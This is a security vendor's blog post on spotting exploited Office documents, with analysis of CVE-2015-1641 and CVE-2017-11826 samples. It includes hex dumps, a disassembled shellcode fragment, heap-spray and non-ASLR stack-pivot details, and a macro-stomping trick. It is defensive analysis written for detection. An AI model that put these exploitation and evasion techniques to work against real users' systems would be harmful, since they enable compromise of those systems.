Our Blog

Assessing risk in Office documents - Part 4: CVE and generic exploit detection

Share

Tuesday, Jun 04, 2019

In part 4, the final part of this 4-part blog series, we’ll examine why and how exploits are used to get code running within Office documents and how we can find signs of Office documents being exploited without knowing about the actual vulnerability itself. We’ll walk through a few commonly exploited vulnerabilities and show you that knowledge about the exploit itself might not be needed. We’ll also investigate obfuscation used on macros and how we cannot always rely on what we see at first sight. At the end we’ll summarize what elements we’ve looked at in this series of blogs that raise risk within documents.

In case you missed part 1part 2 and part 3, here is the background: Forcepoint Innovation Labs conducted a research project to see if we can evaluate risk associated with Microsoft Office documents without focusing on specific malware families. Anti-virus-engines need to be able to classify a document as malicious to block it, while we want to evaluate the level of risk a document carry without those constraints. Code, or the possibility of getting any code in any form, adds risk. If the level of risk is unacceptable we can then block/quarantine the document on our gateways.

As you progress through the blog series you will build up the knowledge to assess risk instead of depending on a clear AV engine conviction.

Why do attackers use exploits?

Attackers need to find a way of getting their code to run when a document is activated. Having macros or embedding executable code is quite noticeable, as is linking if you search in the right places. Exploiting vulnerabilities within the Office suite is harder to defend against on the gateway when documents are inspected. As we discussed in part 1, vulnerabilities are bugs in the software code. If they can be exploited to get code to run it becomes much more convenient for an attacker to get their code running inside your organization. If it’s an unknown vulnerability (0-day) being exploited it’s very hard to defend against at a gateway-level - or at all. We'll discuss that later when we discuss generic exploit detection.

Let’s take an example when you’re dealing with a document with no embedded executable content, no URLs and no macros to investigate.

Exploiting a known vulnerability means that at some stage, something inside the document is specifically modified in a way which will result in the application opening the document to behave the way the attacker wants. The real question is, what has been changed to achieve that. A normal document might have thousands of configuration settings. Binary streams that have records describing one area, XML with a lot of values and data, RTF with their structures and so on. How do you pinpoint which one will cause a problem? It could be as simple as setting a hexadecimal value to something Office doesn’t expect and causing Office to malfunction, but that’s just the very first step. Afterwards it needs to be able to transfer execution to code available from somewhere within the document file. This code needs to contain instructions the actual CPU understands, for example x86/x64 code.

CVE-2015-1641

Let’s follow a practical example. You are familiar with CVE-2017-11882 that we covered in part 3. The bug is a no-length-check being done on the filename copied into a buffer of just 40 bytes, and the code that will be executed is located within the same stream. This time we’ll follow another well-used vulnerability, CVE 2015-1641, which works in a different way (Sample 1). Note that the complete output of the objects found with our own research tool can be found in Appendix B.

We start this journey with an RTF file. That contains several objdata objects, but we’ll start with the first. This file contains an embedded OLE2 archive. Inside this OLE2 archive you’ll find a Root Entry/Package stream which is a ZIP archive:

Inside the ZIP we have a lot of XML files, which you normally have within any newer Word documents. The bug that has been exploited relates to SmartTag handling. If we search for the various SmartTags defined in these XML files, we find the bad one in word.document.12.objects/Root Entry/Package.objects/word/document.xml:

What’s different with this SmartTag compared to the others also present in the file? The difference is the “id”, “moveFromRangeStart”, “moveFromRangeEnd” and the “name”.  Now we need to understand what the bug is. The problem is that this SmartTag entry tells Word to start using offset 0x09000808 (150997000 in decimal) as its stack. At some point Word will execute a “retn” instruction and now it’s up to this new stack to define where the CPU execution will continue. Why select 0x09000808? With Address Space Layout Randomization (ASLR), why did the malware author set the stack to this location? To start the answer, the malware use an ActiveX component called OTKLOADR.DLL. This DLL depends on a Microsoft C runtime library called MSVCR71.DLL which unfortunately doesn’t support ASLR. This means it will get loaded at a specific base-offset every time. It then uses ActiveX to perform a heap spray and maps single a binary blob (activeX52.bin) many times over in memory:

The file activeX52.bin is an OLE2 archive of 2095161 bytes which gets mapped into memory numerous times (filling up the buffer around the specified new stack ~0x09000000):

-ScanObject("ARCHIVE_FS" (1:"OLE2",2095616,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX52.bin")
-ScanObject("OLE2_FS" (0:"UNKNOWN",106,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX52.bin|Root Entry/Contents")

As you can see, the file itself is huge, but the “real” contents of it is small – only 106 bytes “Contents” stream. What do you think the rest is for? It’s the data/code needed to lead the execution to the shellcode.

If you didn’t know exactly what bug the malware author is abusing, what other elements could you have said are risky about this document?

  • To start with, it uses a non-standard {\rtf1 opening, but sadly Office just checks the first 4-bytes ({\rt) and the rest isn’t validated.
  • Some obfuscations done inside the RTF objdata structures, but it's not complex. Could be enough to say block – e.g.: {A\*\o b jdata  {\*\AAAAAAAA 12345678901234567890 111111111111111}
  • The RTF consist of many embedded OLE2 archives, you would probably get a lot of false-alarms if you block on that basis
  • The fact that it uses an ActiveX component that uses a non-aware ASLR DLL. You’d need to research what ActiveX classes internally use what DLLs which are not ASLR aware – which is doable.
  • Mapping the same (huge?) binary blob into memory at many different locations:
    • The contents of this binary blob contains x86 code, and/or points to, in this case, 0x7C3761BB – inside the non-ASLR DLL MSVC71.DLL.
  • The mapped OLE2 archive only contains a single file of a 106 byte stream, and has approximately 2MB of data/code unaccounted for.
  • The fact that after the last '}' of the closing {\rtvpn opening, you find data. There shouldn’t be anything there.

So, even if you didn’t know about this specific vulnerability there are many signs saying this file is trying to exploita vulnerability and shouldn’t be allowed anywhere since it poses risk. VirusTotal say 42 or 58 engines detect this file, but ideally it should have been 100% since the vulnerability is from 2015.

CVE-2017-11826

Let’s look at another exploit, this time for CVE-2017-11826 (Sample 2). Again, we deal with an RTF file and as before the complete output from our research tool can be found in Appendix B.

To start with, let’s focus on the 2 Word documents we’ll find embedded:

-ScanObject("GENERIC_FS" (10:"RTF",560752,"d9fac68b6c49c485675d9141f375799d10572999")
       -ScanObject("GENERIC_FS" (32:"OLEOBJ",14385,"d9fac68b6c49c485675d9141f375799d10572999|objdata_0")
              -ScanObject("MEM_FS" (1:"OLE2",14336,"d9fac68b6c49c485675d9141f375799d10572999|objdata_0|RTFOLEOBJECT|word.document.12")
       -ScanObject("GENERIC_FS" (32:"OLEOBJ",53297,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1")
              -ScanObject("MEM_FS" (1:"OLE2",53248,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12")

There are no macros, no linking and nothing directly attached that could be directly executable. We now need to check if this could be using an exploit. As we’ve mentioned before, we need 2 or 3 things to occur:

  •  A bug needs to be exploited so execution of some code can be carried out
  • Redirection to this code must occur if it’s not a part of the buffer doing the exploitation
  • The code itself, most likely a set of valid x86 instructions

Inside the RTF we find the following:

It’s using a COM object with a slightly obfuscated CLSID D5DE8D20-5BB8-11D1-A1E3-00A0C90F2731. This corresponds to MSVBVM60.DLL (Visual Basic 6 runtime). This DLL does not use ASLR and will  therefore load at a static location.

Another line from the output of our own tool is also very interesting:

Embedded into objdata_1, we find a “Package” that contains a Word Document that contains a new OLE2 archive (activeX1.bin). This is 2099200 bytes long (over 2 MB), but it only contains a root entry. Could we have a bug in our parser?

00000400  52 00 6f 00 6f 00 74 00  20 00 45 00 6e 00 74 00  |R.o.o.t. .E.n.t.|
00000410  72 00 79 00 00 00 00 00  00 00 00 00 00 00 00 00  |r.y.............|
00000420  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000430  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000440  16 00 05 00 ff ff ff ff  ff ff ff ff 01 00 00 00  |................|
00000450  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000460  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000470  00 00 00 00 03 00 00 00  40 00 00 00 00 00 00 00  |........@.......|
00000480  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000490  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
000004a0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
000004b0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
000004c0  00 00 00 00 ff ff ff ff  ff ff ff ff ff ff ff ff  |................|
000004d0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
000004e0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
000004f0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000500  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|

This is very suspicious as there is no file inserted in the OLE2 archive. Why would any legit program do this? In the “unused” area of this file we find some repeating data:

00003200  2b 0e 98 72 2b 0e 98 72  2b 0e 98 72 2b 0e 98 72  |+..r+..r+..r+..r|
00003210  2b 0e 98 72 2b 0e 98 72  2b 0e 98 72 2b 0e 98 72  |+..r+..r+..r+..r|
00003220  2b 0e 98 72 2b 0e 98 72  2b 0e 98 72 2b 0e 98 72  |+..r+..r+..r+..r|

00003800  cb 40 94 72 ec 83 88 08  cb 40 94 72 ec 83 88 08  |.@.r.....@.r....|
00003810  cb 40 94 72 ec 83 88 08  cb 40 94 72 ec 83 88 08  |.@.r.....@.r....|
00003820  cb 40 94 72 ec 83 88 08  cb 40 94 72 ec 83 88 08  |.@.r.....@.r....|
00003f30  cb 40 94 72 d0 10 94 72  8f 08 95 72 b0 dd 95 72  |.@.r...r...r...r|
00003f40  90 8c 88 08 01 02 00 00  40 00 00 00 45 c0 a4 72  |........@...E..r|
00003f50  89 2d 88 88 88 08 9b 9b  33 c9 64 8b 71 30 8b 76  |.-......3.d.q0.v|
00003f60  0c 8b 76 1c 8b 46 08 8b  7e 20 8b 36 81 3f 6b 00  |..v..F..~ .6.?k.|
00003f70  65 00 75 f0 8b f0 eb 57  60 8b de 56 8b 73 3c 8b  |e.u....W`..V.s<.|
00003f80  74 1e 78 03 f3 56 8b 76  20 03 f3 33 c9 49 41 ad  |t.x..V.v ..3.IA.|

If we try to disassemble this code (from offset 0x3f58) we get the following using “objdump -D -Mintel,i386 -b binary -m i386 activeX1.bin --start-address=0x3f58”:

    3f58:     33 c9                      xor    ecx,ecx
    3f5a:     64 8b 71 30                mov    esi,DWORD PTR fs:[ecx+0x30]
    3f5e:     8b 76 0c                   mov    esi,DWORD PTR [esi+0xc]
    3f61:     8b 76 1c                   mov    esi,DWORD PTR [esi+0x1c]
    3f64:     8b 46 08                   mov    eax,DWORD PTR [esi+0x8]
    3f67:     8b 7e 20                   mov    edi,DWORD PTR [esi+0x20]
    3f6a:     8b 36                      mov    esi,DWORD PTR [esi]
    3f6c:     81 3f 6b 00 65 00          cmp    DWORD PTR [edi],0x65006b
    3f72:     75 f0                      jne    0x3f64
    3f74:     8b f0                      mov    esi,eax
    3f76:     eb 57                      jmp    0x3fcf

    3f78:     60                         pusha 
    3f79:     8b de                      mov    ebx,esi
    3f7b:     56                         push   esi
    3f7c:     8b 73 3c                   mov    esi,DWORD PTR [ebx+0x3c]
    3f7f:     8b 74 1e 78                mov    esi,DWORD PTR [esi+ebx*1+0x78]
    3f83:     03 f3                      add    esi,ebx
…
    3fcf:     8b fc                      mov    edi,esp
    3fd1:     c7 07 67 59 de 1e          mov    DWORD PTR [edi],0x1ede5967
    3fd7:     c7 47 04 00 00 00 00       mov    DWORD PTR [edi+0x4],0x0
    3fde:     8b ef                      mov    ebp,edi
    3fe0:     e8 93 ff ff ff             call   0x3f78
    3fe5:     6a 40                      push   0x40
    3fe7:     68 00 30 00 00             push   0x3000
    3fec:     68 00 00 50 00             push   0x500000
    3ff1:     6a 00                      push   0x0
    3ff3:     ff 17                      call   DWORD PTR [edi]
    3ff5:     8b f8                      mov    edi,eax
    3ff7:     8f 47 24                   pop    DWORD PTR [edi+0x24]

Clearly this is shellcode that an attacker wants to use. We see it going through the PEB (Process Environment Block) looking through one of the loader-lists for the DLL starting with “KE”; which is KERNEL32.DLL. From here on it’s "game on" for the malware. We know the malware wants code execution to end up here for it to deliver its payload. Once again, we can see that it maps activeX1.bin several times in memory:

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
       <Relationship Id="rId1" Type="http://schemas.microsoft.com/office/2006/relationships/activeXControlBinary" Target="activeX1.bin"/>
</Relationships>

If we count the number of activeX??.xml_rels it uses we find 40 instances of this 2MB binary mapped into the process space of Word. It’s definitely used to heap-spray the memory to prepare to use an exploit.  At the end of the legit space of the RTF file, we find data appended to it too:

It's clearly a risky document. To understand what specific CVE it is using is secondary at this stage, but let’s examine what makes CVE-2017-11826 work. There is a bug in Office when it tries to render tags within the Office Open XML format. The tag:

The font name doesn’t look right. Let’s look at it in a hex-editor:

This will exploit the bug in Office, and via the known address space of MSVBVM60, the ROP chain and the shellcode execution, the attacker has a stable environment to run their payload. VirusTotal shows the detection of this file being 36 or 58 engines at the time of testing. 

Once again, without too much knowledge of the vulnerability itself there are many signs that this file does contain an exploit and should be blocked on a gateway.

Malicious macros as source-code, p-code or executable code?

Office macro code can exist in 3 different forms. So far we have extracted the decompressed LZNT1 source-code. It doesn’t have to be present (although it has some limitations if it’s not there) and there could still be executable macro code running, causing risk to the organization. Office will “compile” the source-code lines into p-codes during creation in the editor. These p-codes will be stored in the module stream. The source-code is only used to recompile the p-code if the document is opened under a different VBA version than the author used when the document was generated (e.g. VBA5 and VBA7). That means if the source-code isn’t present - and Office needs to recompile because of a VBA version mismatch of version - it doesn’t work. If the p-code has been executed at least once it will be converted to execodes and stored in the __SRP_? streams. Presence of p-code, execodes or source code is a sign of code from macros being present that needs to be analysed, or removed if that complies with policy. They all add risk.

As our final example, let’s consider Sample 3:

-ScanObject("GENERIC_FS" (1:"OLE2",38400,"cad8cb2e9d16623f6b09b22e058f15585c36f3bb5379c5dc578a1d44c0bf2b27")
       -ScanObject("OLE2_FS" (21:"TEXT",367,"cad8cb2e9d16623f6b09b22e058f15585c36f3bb5379c5dc578a1d44c0bf2b27|Root Entry/Macros/PROJECT")
       -ScanObject("OLE2_FS" (16:"VBAx_MACRO",10363,"cad8cb2e9d16623f6b09b22e058f15585c36f3bb5379c5dc578a1d44c0bf2b27|Root Entry/Macros/VBA/ThisDocument")
       -ScanObject("OLE2_FS" (0:"UNKNOWN",522,"cad8cb2e9d16623f6b09b22e058f15585c36f3bb5379c5dc578a1d44c0bf2b27|Root Entry/Macros/VBA/dir")
       -ScanObject("OLE2_FS" (0:"UNKNOWN",2681,"cad8cb2e9d16623f6b09b22e058f15585c36f3bb5379c5dc578a1d44c0bf2b27|Root Entry/Macros/VBA/_VBA_PROJECT")
       -ScanObject("OLE2_FS" (0:"UNKNOWN",41,"cad8cb2e9d16623f6b09b22e058f15585c36f3bb5379c5dc578a1d44c0bf2b27|Root Entry/Macros/PROJECTwm")
       -ScanObject("OLE2_FS" (0:"UNKNOWN",7280,"cad8cb2e9d16623f6b09b22e058f15585c36f3bb5379c5dc578a1d44c0bf2b27|Root Entry/1Table")
       -ScanObject("OLE2_FS" (0:"UNKNOWN",4096,"cad8cb2e9d16623f6b09b22e058f15585c36f3bb5379c5dc578a1d44c0bf2b27|Root Entry/WordDocument")
       -ScanObject("OLE2_FS" (0:"UNKNOWN",114,"cad8cb2e9d16623f6b09b22e058f15585c36f3bb5379c5dc578a1d44c0bf2b27|Root Entry/.CompObj")
       -ScanObject("OLE2_FS" (0:"UNKNOWN",4096,"cad8cb2e9d16623f6b09b22e058f15585c36f3bb5379c5dc578a1d44c0bf2b27|Root Entry/.SummaryInformation")
       -ScanObject("OLE2_FS" (0:"UNKNOWN",4096,"cad8cb2e9d16623f6b09b22e058f15585c36f3bb5379c5dc578a1d44c0bf2b27|Root Entry/.DocumentSummaryInformation")

Nothing out of the ordinary here. We have a VBA/ThisDocument which contains the macro-source code. If we look at this source code, it decompress to:

Sub sbHello()
MsgBox "Hello World!"
End Sub

That doesn’t look very malicious does it? A function sbHello shows a message box “Hello World”. Maybe someone is testing something for the first time?

If we have a look at the identifiers present in the VBA_PROJECT stream - which was created by Word when the “original” macro was entered – it looks like this:

VBA_IDENTIFIERS:
Word, VBA, Win16, Win32, Win64, Mac, VBA6, VBA7, Project1, stdole, Project, ThisDocument
_Evaluate, Normal, Office, Auto_Open, Document, omVsI, GhHqwBBoV, TWgKXCEMpLNvAkL
duWktH, zomnqaCVeYJhMzN, ifZKwUg, CreateObject, hCiSSPdnGWigF, Run, title, msg
intResponse, MsgBox, Application, Quit

indeed it has an MsgBox identifier, but where is sbHello? Why is there an Auto_Open, CreateObject, Application, Run etc? It seems likely that the source-code has been replaced and the p-code present in this document could be up to no good. If we use an excellent tool from Vesselin Bontchev called pcodedmp you’ll see that the code compiled in the document (Appendix 4 – Sample 4) isn’t anything near as innocent as MsgBox (“Hello World”). In fact, it’ll use powershell.exe to probably carry out a download.  This could be the work of a tool called EvilClippy; read about it here.

As I see it we have 2 challenges:

  1. If a source code is present we can match the VBA_PROJECT identifiers to the source-code. If we see that most of the identifiers are used, and that the source doesn’t use identifiers not present in the VBA_PROJECT, one can assume the source code to be accurate. Our research tool calculates the match of the source code presence vs the Identifiers, and the number of identifiers being actually used compared to the source and hence it’s easy to identify that there is a mismatch and the document carries code that causes too much risk (SourcePCode_Match:50.00|SourcePCode_Unused:96.00).
  2. If the source-code is totally removed and you only have the p-code to analyse you need to implement a similar functionality as Vessenlin Bontchev implemented in his pcodedmp and base your detection on this rather than the source-code. In fact, this is something you should start doing right now anyway (as you’ll see below)!

A check on VirusTotal shows us that 4 out of 60 engines detect this as malicious. This is clearly an area of improvement for the other 56 engines (also you can see signs that Vesselin worked at F-prot (now Cyren) some time ago).

Conclusion

Detecting documents that have exploits can be hard. It helps if there is a corresponding known vulnerability so you can pinpoint exactly what error in the document will make Office malfunction. In many cases there are signs you can use to say a document is exploited, as we’ve seen with both CVE-2017-11826 and CVE-2015-1641. If you decompile the documents to the lowest level you will find clear indicators that the file is exploited without knowing exactly what bug it’s trying to utilize.

 

To summarize a few indicators of risk we have discussed:

  • VBA macros are present (in any form, and validate that source code matches the executable format – or check the p-code directly!)
  • Embedded objects carry direct executable content (*.exe, *.js, *.vbs etc)
  • Any object that contains any kind of code/logic capability, e.g. PDF AcroForms.
  • Some kind of linking is done towards non-whitelisted domains/URLs
  • Obfuscation done on at any level in an attempt to hide real content
  • Slack-space in RTF files or OLE2 archives being present indicate risk. Additionally presence of large binary blobs not having any special use (or containing repeating content).
  • Use of components not compatible with ASLR, or known to be used by malicious actors
  • Mapping up binary content that contain shellcode in memory
  • Any data-stream containing shellcode (or valid x86 code)
  • Strange "cocktails" of objects embedded into other objects

 

Documents that carry risk your organization isn’t willing to take can take 2 paths:

  • Block
  • Quarantine – it’s not delivered and will be quarantined for deeper analysis
  • Clean - attempt to remove only the risky elements
  • Perform document sanitation – only know good elements from a document is brought over to a new instance to remove traces of malicious intent, which in essence means (re)building a new document with the old visual contents.

 

We hope you have enjoyed our tutorial on assessing risk in Office documents and hope it has given you insights on how to control risk of documents within your organization. Please talk to us if you need our help!

 

Appendix A

Sample 1 - 72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9
Sample 2 - d9fac68b6c49c485675d9141f375799d10572999
Sample 3 - cad8cb2e9d16623f6b09b22e058f15585c36f3bb5379c5dc578a1d44c0bf2b27

Appendix B

Full example of sample 1

-ScanObject("GENERIC_FS" (10:"RTF",1162424,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9")
       -ScanObject("GENERIC_FS" (32:"OLEOBJ",32308,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_0")
              -ScanObject("MEM_FS" (1:"OLE2",32256,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_0|RTFOLEOBJECT|word.document.12")
                     -ScanObject("OLE2_FS" (0:"UNKNOWN",114,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_0|RTFOLEOBJECT|word.document.12|Root Entry/.CompObj")
                     -ScanObject("OLE2_FS" (7:"ZIP",29272,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_0|RTFOLEOBJECT|word.document.12|Root Entry/Package")
                           -ScanObject("ARCHIVE_FS" (5:"XML",1097,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_0|RTFOLEOBJECT|word.document.12|Root Entry/Package|docProps/app.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",640,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_0|RTFOLEOBJECT|word.document.12|Root Entry/Package|docProps/core.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",47230,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_0|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/document.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",7595,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_0|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/fontTable.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",2488,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_0|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/header1.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",52893,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_0|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/numbering.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",4664,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_0|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/settings.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",169305,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_0|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/styles.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",8714,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_0|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/theme/theme1.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",1857,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_0|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/webSettings.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",7917,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_0|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/_rels/document.xml.rels")
                           -CouldNotScanObject("ARCHIVE_FS","[Content_Types].xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",630,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_0|RTFOLEOBJECT|word.document.12|Root Entry/Package|_rels/.rels")
                     -ScanObject("OLE2_FS" (0:"UNKNOWN",6,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_0|RTFOLEOBJECT|word.document.12|Root Entry/.ObjInfo")
       -ScanObject("GENERIC_FS" (0:"UNKNOWN",1,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|object_1")
       -ScanObject("GENERIC_FS" (32:"OLEOBJ",47157,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2")
              -ScanObject("MEM_FS" (1:"OLE2",47104,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12")
                     -ScanObject("OLE2_FS" (0:"UNKNOWN",114,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/.CompObj")
                     -ScanObject("OLE2_FS" (7:"ZIP",44085,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package")
                           -ScanObject("ARCHIVE_FS" (5:"XML",720,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|docProps/app.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",629,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|docProps/core.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",471,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX1.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",471,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX10.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",471,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX11.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",472,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX12.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",471,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX13.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",471,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX14.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",468,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX15.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",472,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX16.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",470,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX17.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",471,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX18.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",471,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX19.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",472,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX2.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",470,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX20.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",471,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX21.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",470,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX22.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",471,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX23.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",472,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX24.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",472,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX25.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",472,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX26.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",472,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX27.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",471,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX28.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",472,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX29.xml")
